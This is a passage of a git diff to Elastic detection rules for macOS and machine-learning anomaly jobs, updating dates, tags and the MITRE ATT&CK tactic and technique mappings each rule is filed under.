Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.004" +name = "Elevated Execution with Prompt" +reference = "https://attack.mitre.org/techniques/T1548/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml index f295bcc10c8..367e44f0902 100644 --- a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml +++ b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -104,36 +104,31 @@ In macOS environments, the `security_authtrampoline` process is used to execute [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.004" name = "Elevated Execution with Prompt" reference = "https://attack.mitre.org/techniques/T1548/004/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/privilege_escalation_local_user_added_to_admin.toml b/rules/macos/privilege_escalation_local_user_added_to_admin.toml index 0b7b102ae56..735d71241ce 100644 --- a/rules/macos/privilege_escalation_local_user_added_to_admin.toml +++ b/rules/macos/privilege_escalation_local_user_added_to_admin.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -44,14 +44,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -101,19 +94,36 @@ In macOS environments, tools like `dscl` and `dseditgroup` manage user group mem [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/macos/privilege_escalation_root_crontab_filemod.toml b/rules/macos/privilege_escalation_root_crontab_filemod.toml index 49a80762627..b9c9f402814 100644 --- a/rules/macos/privilege_escalation_root_crontab_filemod.toml +++ b/rules/macos/privilege_escalation_root_crontab_filemod.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -47,14 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -101,19 +94,36 @@ Crontab files in macOS are used to schedule tasks, often requiring elevated priv [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/macos/privilege_escalation_user_added_to_admin_group.toml b/rules/macos/privilege_escalation_user_added_to_admin_group.toml index eb4046a403c..52cfa42cab7 100644 --- a/rules/macos/privilege_escalation_user_added_to_admin_group.toml +++ b/rules/macos/privilege_escalation_user_added_to_admin_group.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["jamf_protect"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/23" [transform] [[transform.investigate]] @@ -84,14 +84,7 @@ Jamf Protect is integrated into the Elastic Agent using Fleet. Upon configuratio - Click "Save and Continue". """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Jamf Protect", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Jamf Protect", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -103,19 +96,36 @@ configuration where host.os.type == "macos" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml b/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml index 677898f0c23..77d18fd3e27 100644 --- a/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml +++ b/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -116,14 +116,23 @@ DNS tunneling exploits the DNS protocol to covertly transmit data between a comp - Coordinate with IT and security teams to apply necessary patches and updates to the affected system to close any vulnerabilities exploited by the attacker.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml b/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml index 390ff8b41e2..1e4fb206c9e 100644 --- a/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml +++ b/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -78,13 +78,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "91f02f01-969f-4167-8f55-07827ac3acc9" severity = "low" -tags = [ - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Command and Control", - "Resources: Investigation Guide", -] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Initial Access", "Tactic: Reconnaissance", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -123,19 +117,49 @@ The 'Unusual Web Request' detection leverages machine learning to identify rare - Review and update firewall and intrusion detection/prevention system (IDS/IPS) rules to better detect and block uncommon URLs associated with command-and-control activities.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.003" +name = "Wordlist Scanning" +reference = "https://attack.mitre.org/techniques/T1595/003/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml b/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml index 8ad611b108e..521c82e9536 100644 --- a/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml +++ b/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -76,13 +76,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "91f02f01-969f-4167-8d77-07827ac4cee0" severity = "low" -tags = [ - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Command and Control", - "Resources: Investigation Guide", -] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Reconnaissance", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -121,19 +115,31 @@ User agents identify applications interacting with web servers, typically browse - Report the incident to the appropriate internal teams and, if necessary, escalate to external cybersecurity authorities or partners for further investigation and support.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml b/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml index e2c5d123724..50b24290b61 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -135,14 +135,18 @@ The 'Spike in Logon Events' detection leverages machine learning to identify ano - Enhance monitoring and alerting mechanisms to detect similar spikes in logon events in the future, ensuring rapid response to potential threats.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml b/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml index 3305439fe96..06017cb240b 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2024/06/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -115,48 +115,35 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "e26aed74-c816-40d3-a810-48d6fbd8b2fd" severity = "low" -tags = [ - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Credential Access", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Credential Access", "Tactic: Initial Access", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/ml/execution_ml_windows_anomalous_script.toml b/rules/ml/execution_ml_windows_anomalous_script.toml index af93615b61d..f233da07dca 100644 --- a/rules/ml/execution_ml_windows_anomalous_script.toml +++ b/rules/ml/execution_ml_windows_anomalous_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -108,31 +108,40 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/ml/initial_access_ml_auth_rare_user_logon.toml b/rules/ml/initial_access_ml_auth_rare_user_logon.toml index 47a768779c8..381607c588e 100644 --- a/rules/ml/initial_access_ml_auth_rare_user_logon.toml +++ b/rules/ml/initial_access_ml_auth_rare_user_logon.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2024/06/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -116,35 +116,30 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "138c5dd5-838b-446e-b1ac-c995c7f8108a" severity = "low" -tags = [ - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Tactic: Persistence", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml b/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml index b4a53fb620b..b592f2f66d1 100644 --- a/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml +++ b/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -77,26 +77,35 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Tactic: Lateral Movement", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/ml/ml_high_count_events_for_a_host_name.toml b/rules/ml/ml_high_count_events_for_a_host_name.toml index 3af1d24172b..881ee8ef844 100644 --- a/rules/ml/ml_high_count_events_for_a_host_name.toml +++ b/rules/ml/ml_high_count_events_for_a_host_name.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -92,59 +92,3 @@ The detection of a spike in host-based traffic leverages machine learning to ide - Implement network segmentation to limit the spread of potential threats and reduce the impact of similar incidents in the future. - Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional resources are needed for a comprehensive response.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat.technique]] -id = "T1498" -name = "Network Denial of Service" -reference = "https://attack.mitre.org/techniques/T1498/" - -[[rule.threat.technique]] -id = "T1499" -name = "Endpoint Denial of Service" -reference = "https://attack.mitre.org/techniques/T1499/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" diff --git a/rules/ml/ml_high_count_network_denies.toml b/rules/ml/ml_high_count_network_denies.toml index 39e7bd4d1f3..108b838ecfb 100644 --- a/rules/ml/ml_high_count_network_denies.toml +++ b/rules/ml/ml_high_count_network_denies.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -74,7 +74,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "eaa77d63-9679-4ce3-be25-3ba8b795e5fa" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Discovery", "Tactic: Impact", "Tactic: Reconnaissance", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -114,70 +114,38 @@ Firewalls and ACLs are critical in controlling network traffic, blocking unautho [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" - [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" - [[rule.threat.technique]] -id = "T1590" -name = "Gather Victim Network Information" -reference = "https://attack.mitre.org/techniques/T1590/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1498" +name = "Network Denial of Service" +reference = "https://attack.mitre.org/techniques/T1498/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat.technique]] -id = "T1498" -name = "Network Denial of Service" -reference = "https://attack.mitre.org/techniques/T1498/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1499" -name = "Endpoint Denial of Service" -reference = "https://attack.mitre.org/techniques/T1499/" +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/ml_high_count_network_events.toml b/rules/ml/ml_high_count_network_events.toml index 788730443c5..84ceaa444bc 100644 --- a/rules/ml/ml_high_count_network_events.toml +++ b/rules/ml/ml_high_count_network_events.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -110,55 +110,3 @@ Machine learning models analyze network traffic patterns to identify anomalies, - Review and update network access controls and permissions to ensure only authorized users and devices have access to sensitive data and systems. - Implement enhanced monitoring and alerting for similar traffic patterns to improve early detection and response to future incidents.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat.technique]] -id = "T1498" -name = "Network Denial of Service" -reference = "https://attack.mitre.org/techniques/T1498/" - diff --git a/rules/ml/ml_linux_anomalous_network_activity.toml b/rules/ml/ml_linux_anomalous_network_activity.toml index 6993543b038..b1e1b9fef20 100644 --- a/rules/ml/ml_linux_anomalous_network_activity.toml +++ b/rules/ml/ml_linux_anomalous_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", 